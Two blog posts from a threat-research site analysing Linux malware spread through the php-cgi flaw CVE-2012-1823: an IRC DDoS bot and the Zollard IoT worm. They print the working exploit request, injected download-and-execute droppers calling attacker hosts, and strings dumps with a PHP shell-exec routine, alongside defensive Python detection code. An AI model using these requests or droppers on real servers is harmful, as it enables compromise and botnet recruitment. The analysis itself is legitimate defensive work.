Tuesday, July 8, 2014

Another Linux DDoS bot via CVE-2012-1823

If you run a web server, you should be very familiar with the PHP vulnerability classified as CVE-2012-1823. Successful exploitation of this vulnerability allows a remote attacker to inject arbitrary code via php-cgi command-line options passed in the HTTP query string. Unfortunately, a large number of PHP servers remain unpatched against it, making them an ideal vehicle for a DDoS bot.

Our friends at MalwareMustDie have recently put up several excellent posts discussing Linux malware, particularly DDoS malware. While they have covered a wide spectrum of Linux malware in the wild, new variants and bot infrastructures are continually being spun up. We like to study and track these variants and infrastructures, as well as the payloads being injected. In this case, one particular payload caught our eye.

The exploit attempt arrived with the following URL-encoded request:

POST //cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
Host: -h

When decoded, the query string reads:

-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n

Decoded CVE-2012-1823 exploit attempt

Upon successful compromise, the attacker injects the following:

<? system("cd /tmp ; wget <redacted>.us.to/seed.jpg ; curl -O http://<redacted>.us.to/seed.jpg ; fetch http://<redacted>.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed ; rm -rf * "); ?>

"seed.jpg" is actually a tar file, which when expanded reveals a bash script named "seed":

#!/bin/bash
cd /var/tmp/ ;wget <redacted>.us.to/index.htm; curl -O http://<redacted>.us.to/index.htm; fetch http://<redacted>.us.to/index.htm; tar -xzvf index.htm;rm -rf index.htm; perl /var/tmp/libssl3.so.2 ; rm -rf *; wget <redacted>.us.to/stats.php;fetch http://<redacted>.us.to/stats.php ;curl -O http://<redacted>.us.to/stats.php; tar -xzvf stats.php ; rm -rf stats.php ; cd .d ;./autorun

This script instructs the compromised server to fetch 'index.htm' from http://<redacted>.us.to. This again is a tar file, which when expanded gives a file named "libssl3.so.2". This file is actually a Perl script that calls itself "DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team". A copy of this popular IRC bot can be found at this PasteBin link.
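The chain above relies on two tricks a defender can check for mechanically: every stage is fetched three ways (wget, curl, fetch) so that one of them works on any box, and every stage is a tarball whose name claims to be an image or web page. As an added example (not the post's own code), the following Python extracts the download targets, archives and executed files from the 'seed' script quoted above, and sniffs file content against its extension so that a gzip'd tarball named "seed.jpg" is reported as disguised. The script text is the one from the post with its hosts still redacted; the sample file bytes are constructed, and the magic-byte table is this example's own choice.

```python
"""Spot disguised stage files and pull indicators out of a dropper script.

Added example, not the post's own code. SEED_SCRIPT is the 'seed' script quoted
in the post (hosts redacted there and kept redacted here); the sample file
contents are constructed, and the magic-byte table is this example's choice.
"""
import gzip
import re

SEED_SCRIPT = (
    "cd /var/tmp/ ;wget <redacted>.us.to/index.htm; curl -O http://<redacted>.us.to/index.htm; "
    "fetch http://<redacted>.us.to/index.htm; tar -xzvf index.htm;rm -rf index.htm; "
    "perl /var/tmp/libssl3.so.2 ; rm -rf *; wget <redacted>.us.to/stats.php;"
    "fetch http://<redacted>.us.to/stats.php ;curl -O http://<redacted>.us.to/stats.php; "
    "tar -xzvf stats.php ; rm -rf stats.php ; cd .d ;./autorun"
)

FETCH_RE = re.compile(r"\b(?:wget|fetch|curl\s+-O)\s+([^\s;]+)")
ARCHIVE_RE = re.compile(r"\btar\s+-x\w*\s+([^\s;]+)")
PERL_RE = re.compile(r"\bperl\s+([^\s;]+)")
DOTSLASH_RE = re.compile(r"(?<![\w./])\./([^\s;]+)")


def extract_dropper_iocs(script: str) -> dict:
    """Return the download targets (scheme stripped, de-duplicated in order),
    the archives unpacked, and the files executed by a wget/curl/fetch dropper."""
    fetched = []
    for target in FETCH_RE.findall(script):
        target = re.sub(r"^https?://", "", target)
        if target not in fetched:
            fetched.append(target)
    executed = PERL_RE.findall(script) + ["./" + p for p in DOTSLASH_RE.findall(script)]
    return {"fetched": fetched, "archives": ARCHIVE_RE.findall(script), "executed": executed}


# (offset, signature, kind), checked in order; the tar check lives at offset 257.
MAGIC = [
    (0, b"\x1f\x8b", "gzip"),
    (0, b"\x7fELF", "elf"),
    (0, b"\xff\xd8\xff", "jpeg"),
    (0, b"<?", "php"),
    (0, b"#!", "script"),
    (0, b"<!DOCTYPE", "html"),
    (0, b"<html", "html"),
    (257, b"ustar", "tar"),
]
EXT_KIND = {"jpg": "jpeg", "jpeg": "jpeg", "htm": "html", "html": "html",
            "php": "php", "gif": "gif", "png": "png"}


def sniff(data: bytes) -> str:
    """Identify the real content type from leading (or tar's offset-257) bytes."""
    for offset, sig, kind in MAGIC:
        if data[offset:offset + len(sig)] == sig:
            return kind
    return "unknown"


def claimed_kind(name: str) -> str:
    """Content type the file name's extension claims."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return EXT_KIND.get(ext, "unknown")


def is_disguised(name: str, data: bytes) -> bool:
    """True when the extension promises one known type and the bytes are another
    known type, e.g. a gzip'd tarball served as 'seed.jpg'."""
    actual, claimed = sniff(data), claimed_kind(name)
    return "unknown" not in (actual, claimed) and actual != claimed


# Constructed samples: a gzip stream named like an image, a real JPEG header,
# and a bare (uncompressed) tar header named like a PHP file.
SAMPLE_SEED_JPG = gzip.compress(b"#!/bin/bash\ncd /var/tmp/\n")
SAMPLE_REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
SAMPLE_TARBALL = b"\x00" * 257 + b"ustar\x00" + b"\x00" * 250

if __name__ == "__main__":
    print(extract_dropper_iocs(SEED_SCRIPT))
    for name, data in (("seed.jpg", SAMPLE_SEED_JPG), ("photo.jpg", SAMPLE_REAL_JPEG),
                       ("stats.php", SAMPLE_TARBALL)):
        print(name, "->", sniff(data), "disguised" if is_disguised(name, data) else "ok")
```

The extension check is deliberately conservative: a file whose extension or content is not in the tables is reported as not disguised rather than guessed at, so the check produces no noise on the many unusual files a web root legitimately holds.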

Some of the configuration variables for the version of IrcBot dropped on our honeypots include:
$server = 'antiq.scifi.ro'
$server = 'antiq.evils.in'
my @admins = ("AnTiQ","deathy","Vasy");
my @hostauth = ("Qiss.users.undernet.org","Amadeo.users.undernet.org");
my @channels = ("#vnc");

The "seed" script also instructed our server to download "stats.php". This was also a tar file, which when expanded created a hidden directory named ".d" containing the following files:

Contents of hidden '.d' subdirectory
The subdirectory "c" contained source files for port flooding routines.

Contents of 'c' subdirectory


Section of "Slashing SirVic's" flooding source code.

Two other files included in the "stats.php" tarball were of particular interest. They are named "bang.txt" and "shiet.txt", and contain long lists of IP addresses and ports. At this point, it's not clear what these lists represent; however, "bang.txt" appears to contain many non-U.S. addresses, notably weighted toward Romania. "shiet.txt" contains a wide variety of IP addresses, representing many kinds of organizations, corporations, universities, and service providers.
After observing several DDoS attacks initiated by this infrastructure, we did not note a correlation between these lists and any attack victims. Nor have we yet observed any correlation between these lists and the compromised hosts initiating DDoS attack traffic.

The contents of "bang.txt", broken out by ASN and Network name can be viewed from here: Link to "bang.txt"

The contents of "shiet.txt", broken out by ASN and Network name can be viewed from here:  Link to "shiet.txt"

Soon after the scripts were downloaded, our server joined the IRC C2 on antiq.scifi.ro (195.182.159.51):

Bot joining C2 on antiq.scifi.ro
Not long after that, a command initiating a flood attack against 70.39.96.225 was issued, and the compromised host began sending fragmented UDP packets to the victim.


Bot being instructed to begin UDP flood to victim

Packet capture of UDP flood
We've observed this botnet to be very active, targeting a wide variety of victims. While IRC botnets have been around for many years, the seeding and attack mechanisms continue to evolve.

Unpatched CMS installations, weak SSH passwords, and vulnerable PHP deployments remain a major weak spot in Internet-facing servers. It's pretty safe to say that if web site administrators do not run a regular, stringent patch management program, it's just a matter of 'when', not 'if', they will be compromised.



Tuesday, December 3, 2013

Hey Zollard, leave my Internet of Things alone!

We've long been tracking exploit attempts against web servers, notably CMS hosts, ColdFusion, and vanilla PHP/CGI servers. Of late, we've observed a fairly large increase in PHP exploit attempts.  So Symantec's recent report about Linux.Darlloz targeting "The Internet of Things" was of particular interest.

Recently I noted an inbound PHP exploit attempt from 78.39.232.113 (Telecommunication Company of Kordestan, Iran).

PHP exploit attempt from 78.39.232.113
The decoded POST is:

-d allow_url_include=%6Fn -d safe_mode=off -d suhosin%2Esimulation=on -d disable_fu%6Ections="" -d open_basedir=none -d auto_prepend_file=php:%2F/input -d cgi.force_redirec%74=0 -d cgi.redirect_status_env=0 -n

Note the User-Agent "Zollard" and the references to the files that it will attempt to execute upon successful compromise. The file names indicate several architectures: arm, ppc, mips, mipsel, and x86.
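Both this POST and the one in the July 2014 post above are the same CVE-2012-1823 technique: php-cgi hands a query string that contains no literal '=' to PHP as command-line arguments, so a percent-encoded query decodes into a run of -d directives that make PHP execute the POST body. As an added example (not code from either post), the following Python decodes such a query the way php-cgi sees it, parses the -d options, and flags the directives that turn the request into code execution. It runs on the request captured in the July 2014 post and on the partially decoded POST shown here; the list of dangerous directives, and the function names, are this example's own choice.

```python
"""Decode and triage php-cgi query-string option injection (CVE-2012-1823).

Added example, not code from either post. The two query strings embedded below
are the ones captured in the posts; the detection rules are this example's choice.
"""
import re
from urllib.parse import unquote_plus

# The request from the July 2014 post, as captured (percent-encoded, '+' for space).
SEED_REQUEST_LINE = (
    "POST //cgi-bin/php?"
    "%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e"
    "+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66"
    "+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e"
    "+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22"
    "+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65"
    "+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74"
    "+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30"
    "+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30"
    "+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74"
    "+%2d%6e HTTP/1.1"
)

# The Zollard POST as this post printed it: mostly decoded, with a few bytes still
# percent-encoded (%6F, %2E, %74) to dodge naive pattern matching.
ZOLLARD_QUERY = (
    "-d allow_url_include=%6Fn -d safe_mode=off -d suhosin%2Esimulation=on "
    '-d disable_fu%6Ections="" -d open_basedir=none -d auto_prepend_file=php:%2F/input '
    "-d cgi.force_redirec%74=0 -d cgi.redirect_status_env=0 -n"
)

# php.ini directives that, injected via -d, make php-cgi execute the POST body.
# Each maps to the value pattern that counts as dangerous.
DANGEROUS = {
    "auto_prepend_file": re.compile(r"^php://input$", re.I),
    "allow_url_include": re.compile(r"^(on|1)$", re.I),
    "safe_mode": re.compile(r"^(off|0)$", re.I),
    "disable_functions": re.compile(r'^(""|)$'),
    "open_basedir": re.compile(r"^none$", re.I),
    "cgi.force_redirect": re.compile(r"^0$"),
}


def query_from_request_line(line: str) -> str:
    """Return the raw query string of an HTTP request line ('' if none)."""
    target = line.split(" ")[1]
    return target.partition("?")[2]


def decode_query(raw: str) -> str:
    """Decode the way php-cgi's argv parser sees it: '+' is a space, and any
    percent-encoding (upper or lower case, full or partial) is resolved."""
    return unquote_plus(raw)


def parse_php_options(decoded: str):
    """Split decoded text into (flag, value) pairs: '-d k=v' -> ('d', 'k=v'),
    a bare '-n' -> ('n', None), anything else -> ('?', token)."""
    tokens = decoded.split()
    options, i = [], 0
    while i < len(tokens):
        tok = tokens[i]
        if tok == "-d" and i + 1 < len(tokens):
            options.append(("d", tokens[i + 1]))
            i += 2
        elif len(tok) == 2 and tok[0] == "-":
            options.append((tok[1], None))
            i += 1
        else:
            options.append(("?", tok))
            i += 1
    return options


def triage_query(raw: str) -> dict:
    """Decode a query string and report the dangerous -d directives it carries.

    argv_injection is the trigger condition: a raw query with no literal '=' that
    decodes to something starting with '-' is being passed to PHP as arguments.
    (The Zollard string is already decoded in the post, so that flag is False there.)
    """
    decoded = decode_query(raw)
    flagged = []
    for flag, value in parse_php_options(decoded):
        if flag != "d" or value is None:
            continue
        key, _, val = value.partition("=")
        pattern = DANGEROUS.get(key)
        if pattern and pattern.match(val):
            flagged.append((key, val))
    return {
        "decoded": decoded,
        "argv_injection": "=" not in raw and decoded.lstrip().startswith("-"),
        "flagged": flagged,
    }


if __name__ == "__main__":
    for raw in (query_from_request_line(SEED_REQUEST_LINE), ZOLLARD_QUERY):
        report = triage_query(raw)
        print(report["decoded"])
        print("  argv injection:", report["argv_injection"],
              "| dangerous directives:", len(report["flagged"]))
```

Run over access logs, the argv_injection test alone catches the class of request regardless of how the attacker encodes it, while the flagged directives tell an analyst whether the request could have executed code (auto_prepend_file=php://input is the one that matters) or was only probing.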

All files were fetched, and the x86 file was sandboxed on a Linux VM. Immediately, the VM began incrementally scanning 117.201.0.0/18 for an open destination port 58455. The Linux malware also opened a listener on my VM's port 58455.

Compromised host listening on port 58455

Upon finding a remote host listening on that port, the local host would initially send 0x00020015 and would receive one of several replies, including 0x010005, 0x01010006, or 0x01020006.

Depending on the reply, the scanning host would then attempt a Telnet connection to the remote host that it had previously connected to on port 58445. Examining the strings of the malware files shows several usernames that are attempted, including "root" and "admin".
Weak or non-existent passwords allow for a successful Telnet login, with examples below:


Example of Telnet session to a BusyBox device

Example of Telnet session to ARM architecture device
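The scanning behaviour described above (one source, one destination port, consecutive addresses inside a single prefix) is easy to pick out of connection logs without any knowledge of the protocol on 58455. As an added example (not the post's own code), the following Python slides a time window over (src, dport) pairs and reports any source that reaches an unusual number of distinct destinations on one port, together with the smallest prefix that covers them. The records are constructed to mimic the sandboxed VM walking 117.201.0.0/18; the sandbox address 10.0.0.5 and the thresholds are assumptions.

```python
"""Flag a host sweeping one destination port across an address range.

Added example, not the post's own code. The connection records are constructed
to look like what the post describes (a sandboxed host walking 117.201.0.0/18
for port 58455); the sandbox address 10.0.0.5 and the thresholds are assumptions.
"""
import ipaddress
from collections import defaultdict


def build_sample_records():
    """(epoch seconds, src, dst, dport) tuples: 40 consecutive targets on 58455
    from the infected VM, plus a little ordinary web traffic from another host."""
    recs = []
    base = int(ipaddress.IPv4Address("117.201.0.1"))
    for i in range(40):
        recs.append((1000 + i, "10.0.0.5", str(ipaddress.IPv4Address(base + i)), 58455))
    recs += [
        (1005, "10.0.0.7", "93.184.216.34", 443),
        (1006, "10.0.0.7", "93.184.216.34", 80),
        (1010, "10.0.0.7", "151.101.1.69", 443),
    ]
    return recs


def covering_prefix(addrs) -> str:
    """Smallest IPv4 prefix that contains every address in addrs."""
    ints = [int(ipaddress.IPv4Address(a)) for a in addrs]
    lo, hi = min(ints), max(ints)
    plen = 32 - (lo ^ hi).bit_length()
    network = lo & (0xFFFFFFFF << (32 - plen)) & 0xFFFFFFFF
    return f"{ipaddress.IPv4Address(network)}/{plen}"


def detect_port_sweeps(records, window=60, min_targets=20):
    """For each (src, dport), slide a time window over the connections and keep
    the largest set of distinct destinations seen inside one window; report the
    pairs whose best window reaches min_targets."""
    by_key = defaultdict(list)
    for ts, src, dst, dport in records:
        by_key[(src, dport)].append((ts, dst))
    alerts = []
    for (src, dport), hits in by_key.items():
        hits.sort()
        best, j = set(), 0
        for i, (ts, _) in enumerate(hits):
            while hits[j][0] < ts - window:
                j += 1
            distinct = {d for _, d in hits[j:i + 1]}
            if len(distinct) > len(best):
                best = distinct
        if len(best) >= min_targets:
            alerts.append({"src": src, "dport": dport, "targets": len(best),
                           "prefix": covering_prefix(best)})
    return alerts


if __name__ == "__main__":
    for alert in detect_port_sweeps(build_sample_records()):
        print(f"{alert['src']} swept {alert['targets']} hosts on port {alert['dport']} "
              f"within {alert['prefix']}")
```

The covering prefix is what distinguishes a sequential sweep like this one from a host that legitimately talks to many scattered peers on one port; a tight prefix on an unusual port is the signal worth paging on.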

As mentioned earlier, the malware files for the x86, arm, mips, mipsel, and ppc architectures were fetched. You may find it of interest to see a strings dump of each of the files; they follow in the order arm, mips, mipsel, ppc, x86:


#EgvT2
@ #!
!1C "
V! 0
/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/0.run
/var/1.run
/var/idhash
/var/response
/var/challenge
/var/b.arm_v5t
/var/b.arm_v6k
/var/f.arm_v5t
/var/f-t2.arm_v6k
/var/f-t2.mips
/var/f-t2.mipsel
/var/sp.arm_v5t
/var/sp.arm_v6k
/var/t2.arm_v6k
/var/readme
/var/b/b3.arm_v5t
/var/b/b3.arm_v6k
/var/b/b3.mips
/var/b/b3.ramips
/var/b/b3.rtl
/var/b/readme
/var/b/0.run
/var/b/1.run
/var/b/idhash
/dav/0.run
/dav/1.run
/dav/b3.arm_v5t
/dav/b3.arm_v6k
/dav/b3.mips
/dav/b3.rtl
/dav/idhash
/dav/readme
/var/b
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment

/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/tmp/ep2.mips
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mips
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.reginfo
.text
.rodata
.data.rel.ro
.data
.got
.sbss
.bss
.comment
.mdebug.abi32
.pdr
Strings from 'arm' file (first dump above) and from 'mips' file (second dump above)

/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
ep2.mips
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/tmp/ep2.mips
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m
GYvh
QdV[3
y8G9
lQ\a< >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.reginfo
.text
.rodata
.data.rel.ro
.data
.got
.sbss
.bss
.comment
.mdebug.abi32
.pdr
/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
